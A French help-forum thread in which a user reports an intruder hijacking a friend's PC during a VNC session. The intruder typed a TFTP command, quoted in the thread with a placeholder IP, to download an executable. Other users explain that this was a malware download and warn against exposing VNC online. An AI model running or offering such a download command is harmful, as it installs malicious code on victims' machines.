Hacké via TFTP... plus d'infos

Hacké via TFTP... plus d'infos - Windows & Software

Marsh Posté le 24-09-2006 à 15:48:51    

Bonjour, voila j'expose ma péripéthie.
J'étais sur le pc d'un pote via vnc, et quelqu'un d'autre que moi a pris le controle de son pc (norton a affiché une detection d'intrusion, il avait donc a ce moment la 2 pc connecté au sien, le mien + celui de l'espion), le mec a ensuite ouvert cmd puis a tapé tftp -i UNE_IP GET msinexecs.exe, puis plus rien... quelqu'un pourrais t'il m'expliquer ce que l'espion a esseyé de faire ?  
 
Merci

Reply

Marsh Posté le 24-09-2006 à 15:48:51   

Reply

Marsh Posté le 24-09-2006 à 16:09:30    

Reply

Marsh Posté le 24-09-2006 à 18:26:31    

google est la 1ere chose que j'ai faite, quelqu'un saurait m'en dire plus ?

Reply

Marsh Posté le 24-09-2006 à 18:29:57    

Y'avait un mdp pour la connexion VNC ?
Quelle version de VNC ? Certaines ont des failles.
 
Sinon il a essayé de récupérer un logiciel malveillant (virus, trojan, ...)
Quelle était l'IP ?

Reply

Marsh Posté le 24-09-2006 à 22:01:13    

ShonGail a écrit :

Y'avait un mdp pour la connexion VNC ?
Quelle version de VNC ? Certaines ont des failles.
 
Sinon il a essayé de récupérer un logiciel malveillant (virus, trojan, ...)
Quelle était l'IP ?


 
oui il y avait un mot de passe, la dernière version donc pas de pb de failles (pas la 4.0.1)
son IP venais de londre, jai fait un trace rout mais il a très bien pu passer par un proxy.

Reply

Marsh Posté le 24-09-2006 à 22:26:54    

Ce n'est pas parce que c'est la dernière version qu'une faille n'est pas présente, ni peut-être exploitée.
 
Si le mdp était costaud, c'est même la seule explication si VNC a bien été la porte d'entrée du hack.
 
Solution : ne pas utiliser VNC.
Perso je ne l'utilise qu'en local. Jamais ouvert sur le net.

Reply

Marsh Posté le 24-09-2006 à 22:39:49    

puis de toute facon le pass a été changé, celui ci m'as été communiqué par téléphone, puis quelques secondes après m'etre re-connecter sur le pc de mon pote via vnc la meme chose s'est reproduite avec une ip différente, me direz vous j'aurais du empecher ceci mais j'ai laisser faire la chose volontairement par curiosité de la commande que la personne allait taper, mais je pense que c'était un bot...

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed